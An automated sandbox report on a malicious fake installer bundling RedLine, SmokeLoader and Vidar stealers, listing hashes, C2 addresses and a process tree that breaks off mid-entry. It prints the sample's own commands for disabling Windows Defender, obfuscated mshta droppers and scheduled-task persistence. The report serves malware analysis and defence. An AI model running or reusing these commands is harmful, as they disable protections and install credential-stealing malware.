Resubmissions

01-11-2021 20:09

211101-yw5kbaafg5 10

01-11-2021 07:13

211101-h2lrdsdhhj 10

01-11-2021 06:40

211101-hfpk6adhfj 10

31-10-2021 18:27

211031-w3r7fsdafj 10

31-10-2021 14:10

211031-rgstmscghm 10

31-10-2021 08:02

211031-jxchlacefm 10

31-10-2021 06:36

211031-hczxqacddp 10

31-10-2021 06:23

211031-g5wv4affb3 10

Analysis

  • max time kernel
    1989s
  • max time network
    2283s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    31-10-2021 06:23

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.5MB

  • MD5

    3da25ccfa9c258e3ae26854391531c7b

  • SHA1

    1ed5613b0ad8ab4c47f07e52199a4edd27be40e6

  • SHA256

    62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

  • SHA512

    defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Malware Config

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 34 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 18 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 20 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 13 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Script User-Agent 20 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:312
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1444
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2672
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2544
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2804
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
                PID:2792
              • C:\Windows\Explorer.EXE
                C:\Windows\Explorer.EXE
                1⤵
                • Drops file in Program Files directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                PID:2872
                • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4368
                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4104
                    • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\setup_install.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\setup_install.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:4424
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4576
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                          6⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4520
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1896
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                          6⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3444
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4620
                        • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03d477f1a31.exe
                          Sun03d477f1a31.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:900
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im chrome.exe
                            7⤵
                              PID:6620
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                8⤵
                                • Kills process with taskkill
                                PID:4480
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4660
                          • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun033e271e0ce96c08.exe
                            Sun033e271e0ce96c08.exe /mixone
                            6⤵
                            • Executes dropped EXE
                            PID:848
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 664
                              7⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:808
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 680
                              7⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1732
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 648
                              7⤵
                              • Program crash
                              PID:884
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 720
                              7⤵
                              • Program crash
                              PID:1976
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 876
                              7⤵
                              • Program crash
                              PID:5876
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 932
                              7⤵
                              • Program crash
                              PID:948
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1104
                              7⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:4564
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4548
                          • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun039750b00c.exe
                            Sun039750b00c.exe
                            6⤵
                            • Executes dropped EXE
                            PID:60
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun039750b00c.exe"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                              7⤵
                                PID:4220
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun039750b00c.exe" ) do taskkill -Im "%~Nxm" /F
                                  8⤵
                                    PID:4596
                                    • C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE
                                      WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI
                                      9⤵
                                      • Executes dropped EXE
                                      PID:3252
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                                        10⤵
                                          PID:1292
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" ) do taskkill -Im "%~Nxm" /F
                                            11⤵
                                              PID:5028
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" VBSCripT: CLOse ( CReAteoBjECt ( "wScrIPT.SHeLL" ). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0 , TRUe ))
                                            10⤵
                                              PID:3384
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV +Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV
                                                11⤵
                                                  PID:3116
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                    12⤵
                                                      PID:5660
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"
                                                      12⤵
                                                        PID:5768
                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                        msiexec.exe -Y .\UKHPfGIw.UMV
                                                        12⤵
                                                        • Loads dropped DLL
                                                        PID:6136
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -Im "Sun039750b00c.exe" /F
                                                  9⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5092
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3744
                                          • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03e4aeb7e43a1c.exe
                                            Sun03e4aeb7e43a1c.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:1200
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3545380196.exe"
                                              7⤵
                                                PID:3732
                                                • C:\Users\Admin\AppData\Local\Temp\3545380196.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\3545380196.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of SetThreadContext
                                                  PID:4648
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                    9⤵
                                                      PID:2740
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 504
                                                      9⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:1552
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8207361562.exe"
                                                  7⤵
                                                    PID:3868
                                                    • C:\Users\Admin\AppData\Local\Temp\8207361562.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\8207361562.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5596
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03e4aeb7e43a1c.exe" & exit
                                                    7⤵
                                                      PID:9536
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "Sun03e4aeb7e43a1c.exe" /f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:8852
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4688
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f0dc4460bc9.exe
                                                    Sun03f0dc4460bc9.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:588
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f0dc4460bc9.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f0dc4460bc9.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4336
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
                                                  5⤵
                                                    PID:4332
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0397381f1f458e.exe
                                                      Sun0397381f1f458e.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2152
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
                                                    5⤵
                                                      PID:904
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun038db98f99bf9a.exe
                                                        Sun038db98f99bf9a.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        PID:2188
                                                        • C:\Users\Admin\Pictures\Adobe Films\TCGCSgu84qvzZRx0NW9e0ICc.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\TCGCSgu84qvzZRx0NW9e0ICc.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5700
                                                        • C:\Users\Admin\Pictures\Adobe Films\2uY4T6WeAF_5cjX6C63paeOJ.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\2uY4T6WeAF_5cjX6C63paeOJ.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:1364
                                                        • C:\Users\Admin\Pictures\Adobe Films\DMs7xN2PEpwJ0Jnna9n8Q_xs.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\DMs7xN2PEpwJ0Jnna9n8Q_xs.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5336
                                                        • C:\Users\Admin\Pictures\Adobe Films\0FZCqVJeAzv2VS0KqMowHiI7.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\0FZCqVJeAzv2VS0KqMowHiI7.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:5676
                                                        • C:\Users\Admin\Pictures\Adobe Films\qruKmRnvt5YcGDNLClNyG_eQ.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\qruKmRnvt5YcGDNLClNyG_eQ.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5360
                                                        • C:\Users\Admin\Pictures\Adobe Films\gVGl0Lr3PuafEQsMKqi_kYOA.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\gVGl0Lr3PuafEQsMKqi_kYOA.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:5388
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                            8⤵
                                                            • Creates scheduled task(s)
                                                            PID:5612
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Creates scheduled task(s)
                                                            PID:4144
                                                          • C:\Users\Admin\Documents\nqNAj9On9wjtwgfjqmiicFFl.exe
                                                            "C:\Users\Admin\Documents\nqNAj9On9wjtwgfjqmiicFFl.exe"
                                                            8⤵
                                                            • Checks computer location settings
                                                            PID:4160
                                                            • C:\Users\Admin\Pictures\Adobe Films\sA60VFexYBtgOHkdYGWV5uUT.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\sA60VFexYBtgOHkdYGWV5uUT.exe"
                                                              9⤵
                                                                PID:2788
                                                              • C:\Users\Admin\Pictures\Adobe Films\m2hXtkoWBRTHdFLL8YQ0eKOc.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\m2hXtkoWBRTHdFLL8YQ0eKOc.exe"
                                                                9⤵
                                                                  PID:6348
                                                                • C:\Users\Admin\Pictures\Adobe Films\Sov0GXL5nuS7yHEfLIWNY2_5.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\Sov0GXL5nuS7yHEfLIWNY2_5.exe"
                                                                  9⤵
                                                                    PID:6564
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                      10⤵
                                                                        PID:6996
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im chrome.exe
                                                                          11⤵
                                                                          • Kills process with taskkill
                                                                          PID:1524
                                                                    • C:\Users\Admin\Pictures\Adobe Films\_EpXmyeXmagJse2oQb2uaJTN.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\_EpXmyeXmagJse2oQb2uaJTN.exe"
                                                                      9⤵
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:6788
                                                                    • C:\Users\Admin\Pictures\Adobe Films\vuVU0x2kcWUBrQhKxQOkbrfw.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\vuVU0x2kcWUBrQhKxQOkbrfw.exe"
                                                                      9⤵
                                                                        PID:4008
                                                                      • C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe"
                                                                        9⤵
                                                                          PID:4508
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                            10⤵
                                                                              PID:4168
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\lafhD6We4LHMR0T61C6drC9J.exe" ) do taskkill -f -iM "%~NxM"
                                                                                11⤵
                                                                                  PID:2452
                                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                    12⤵
                                                                                      PID:6660
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                        13⤵
                                                                                          PID:1320
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                            14⤵
                                                                                              PID:6692
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                            13⤵
                                                                                              PID:7992
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                14⤵
                                                                                                  PID:8120
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                    15⤵
                                                                                                      PID:8080
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                      15⤵
                                                                                                        PID:8168
                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                        15⤵
                                                                                                          PID:6172
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill -f -iM "lafhD6We4LHMR0T61C6drC9J.exe"
                                                                                                    12⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6612
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Dpm7NdXw6Q3yyo6SfMbJHAJ4.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Dpm7NdXw6Q3yyo6SfMbJHAJ4.exe"
                                                                                              9⤵
                                                                                                PID:948
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-1K09L.tmp\Dpm7NdXw6Q3yyo6SfMbJHAJ4.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-1K09L.tmp\Dpm7NdXw6Q3yyo6SfMbJHAJ4.tmp" /SL5="$1048A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Dpm7NdXw6Q3yyo6SfMbJHAJ4.exe"
                                                                                                  10⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:1116
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4FM2U.tmp\ShareFolder.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4FM2U.tmp\ShareFolder.exe" /S /UID=2709
                                                                                                    11⤵
                                                                                                    • Drops file in Drivers directory
                                                                                                    PID:8000
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\08-858fd-f94-c28af-0261ea98d8f67\Tadesinugu.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\08-858fd-f94-c28af-0261ea98d8f67\Tadesinugu.exe"
                                                                                                      12⤵
                                                                                                        PID:5328
                                                                                                        • C:\Windows\System32\cmd.exe
